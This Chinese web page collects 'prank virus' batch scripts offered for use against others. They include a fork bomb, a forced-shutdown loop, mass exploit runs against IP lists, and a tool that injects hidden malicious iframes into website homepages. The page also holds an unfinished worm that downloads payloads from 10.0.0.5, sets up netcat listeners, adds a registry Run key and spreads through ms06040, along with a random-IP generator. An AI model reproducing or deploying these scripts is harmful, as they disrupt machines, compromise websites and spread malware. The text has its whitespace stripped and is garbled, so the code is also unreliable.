三一文库（）〔bat整人电脑病毒代码是怎样的〕*篇一：一些bat恶搞代码第一个:让别人内存OVER(逼他重启)@echooffstartcmd%0就这3行了第二个:让对方重启指定次数(害人专用)@echooffifnotexistc:\1.txtecho.c:\1.txtgotoerr1 ifnotexistc:\2.txtecho.c:\2.txtgotoerr1 ifnotexistc:\3.txtecho.c:\3.txtgotoerr1 ifnotexistc:\4.txtecho.c:\4.txtgotoerr1 ifnotexistc:\5.txtecho.c:\5.txtgotoerr1gotoerr2:err1shutdown-s-t0:err2上面可以让对方电脑重启5次后不在重启第三个:自动踢人(3389肉机保护自己专用)@echoofflogoff1dellog.batlogoff后面的1改成自己登陆的ID号,用queryuser查看第四个:批量自动溢出@for/f%%iin(result.txt)do42%%i58.44.89.158521先自己用NC监听端口,多开几个,然后指行,就自动溢出了第五个:自动挂马改主页@echooffclsrem直接打批处理名字就有帮助title批量挂马,改首页(伤脑筋QQ:447228437).colorAsetpan=%1setye=%2setdai=%3if"%pan%"==""gotoe1if"%ye%"==""gotoe1if"%dai%"==""gotoe1if"%dai%"=="htm.txt"gotou1forfiles/p%pan%/m%ye%/s/c"cmd/cif@isdir==FALSEecho^ iframesrc=":%dai%"width="0"height="0"frameborder="0 "^@path"echo.echo代码全部插入完毕echo.pausegotoe1:u1echo您现在的操作将使%pan%盘下,全部名为%ye%的内容变为您要更改的内容.echo这将是非常危险的,您真的要这样做?回车却认,Ctrl+c取消操作.pauseforfiles/p%pan%/m%ye%/s/c"cmd/cif@isdir==FALSEcopy% 1\htm.txt@path/y"echo.echo首页全部更改完必如果您发现没有替换成功,请将%ye%文件只读属性去掉.echo.pause:e1echo.echo本批处理只适用于2003系统,其他系统要使用,请将forfiles.exe拷贝至系统盘system32目录下echo用法:snj^搜索盘符^^文件名^^网马地址^echo例子:snjd:\index.asp/mm.htmecho批处理将自动添加^iframe^标记echo.echo如果您要更改全部网站的首页!请在批处理文件所在目录下,新建一个名为htm.txt的文本文件.echo然后将要更改的代码加COPY到里面保存.然后将命令的^网马地址^项输入为htm.txt即可.echo例子:snjd:\index.asphtm.txtecho.echo为了能准确无误执行批处理请最好先把记事本的"自动换行功能去掉",让命令保持在一行才能正确执行.echo.echo使用此批处理造成一切后果本人概不负责,请大家谨慎使用!echo.第六个:利用批处理编写利用系统漏洞传播的蠕虫病毒本来想写完后在做教程,要去学校了,所以先把思路告诉大家,大家可以先自己写写,我有时间写完发到群里.这些是我未完成的批处理,大家可以在此基础上按照我下面说的思路继续写完delc:\42.exedelc:\nc.exedelc:\ip.exeechodimwsh%systemroot%\help\test.vbsechosetwsh=CreateObject("WScript.Shell")%systemroot%\help\ test.vbsechowsh.run"cmd/c%systemroot%\help\nc-v-l-p 810%systemroot%\help\or.txt",0%systemroot%\help\te st.vbsechodimwsh%systemroot%\help\test2.vbsechosetwsh=CreateObject("WScript.Shell")%systemroot%\help\ test2.vbsechowsh.run"cmd/cstart%systemroot%\help\good.bat",0%systemroot%\help\test2.vbsechoopen10.0.0.5%systemroot%\help\ftp.txt echoopenmyyes%systemroot%\help\ftp.txtecho1%systemroot%\help\ftp.txtechobinary%systemroot%\help\ftp.txtechoget42.exec:\42.exe%systemroot%\help\ftp.txt echogetnc.exec:\nc.exe%systemroot%\help\ftp.txt echogetip.exec:\ip.exe%systemroot%\help\ftp.txt echobye%systemroot%\help\ftp.txtechoechoSetxPost=CreateObject("Microsoft.XMLHTTP") ^1.vbs%systemroot%\help\or.txtechoechoxPost.Open"GET",":10.0.0.5/my.exequo...,0 ^^1.vbs%systemroot%\help\or.txtechoechoxPost.Send()^^1.vbs%systemroot%\help\or.txt echoechoSetsGet=CreateObject("ADODB.Stream")^^1.vbs%systemroot%\help\or.txtechoechosGet.Mode=3^^1.vbs%systemroot%\help\or.txte choechosGet.Type=1^^1.vbs%systemroot%\help\or.txtec hoechosGet.Write(xPost.responseBody)^^1.vbs%systemroot%\help\or.txtechoechosGet.SaveToFile"d:\my.exe",2^^1.vbs%systemroot%\help\or.txtechoecho1.vbs^^1.vbs%systemroot%\help\or.txtechoechomy.exe^^1.vbs%systemroot%\help\or.txtechoWindowsRegistryEditorVersion5.00%systemroot%\he lp\1.regecho[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Run]%systemroot%\help\1.regecho"SKYNETPersonalFireWall"="F:\\系统安全工具\\FireWall\\PFW.exe"%systemroot%\help\1.regecho"1"="%systemroot%\\help\\test2.vbs"%systemroot% \help\1.regifnotexist%systemroot%\help\good.batcopygood.bat%systemroot%\help\good.bat%systemroot%\help \test2.vbsdelgood.batregedit-s%systemroot%\help\1.regftp-s:%systemroot%\help\ftp.txtmovec:\nc.exe%systemroot%\help\/ymovec:\42.exe%systemroot%\help\/ymovec:\ip.exe%systemroot%\help\/y%systemroot%\help\test.vbsremfor/f%%iin(result1.txt)doseta=%%iremfor/f%%jin(result.txt)do42%a%%%j810准备:1:找一个反向连接的溢出攻击程序,如ms06040漏洞2:找呀一个免费FTP空间,最好是送域名的3:利用你所知道的高级语言编写一个,能生成随机范围IP地址和找到本机IP的工具.思路:用for语句对指定文本里的IP进行溢出,然后用if语句判断是否溢出成功,如果成功开启一个NC监听端口,NC后面带一个输入符号输入的内容为下载本批处理文件,然后执行这个批处理.这样被溢出的机器就又会在他那里运行我门的批处理,从而到自动传播的目的.把批处理生成的文件集中放到一个目录下,可以%systemroot%系统变量直接放到系统目录下因为批处理运行后会闪出命令行窗口,我门可以利用VBS脚本来运行我们的批处理,这样就不会有任何窗口出现,脚本如下echodimwsh%systemroot%\help\test.vbsechosetwsh=CreateObject("WScript.Shell")%systemroot%\help\ test.vbsechowsh.run"cmd/c%systemroot%\help\nc-v-l-p 810%systemroot%\help\or.txt",0%systemroot%\help\te st.vbs生成随机IP工具的VB代码PrivateSubForm_Load()DimfsoAsNewFileSystemObjectDima,b,c,dAsIntegerDimph,eAsStringph=App.Path"\""ip.txt"Randomizea=Int(253*Rnd+1)b=Int(253*Rnd+1)c=Int(240*Rnd+1)OpenphForOutputAs#1Fori=cToc+7Forj=1To254e=a"."b"."i"."jPrint#1,eDoEventsNextjNextiClose#1UnloadMeEndSub*篇二：整人“病毒”代码(一)发表于2013-10-2310:33前段时间看到大家对这种整人的代码兴趣还挺浓厚的，我最近就收集了一些和大家分享。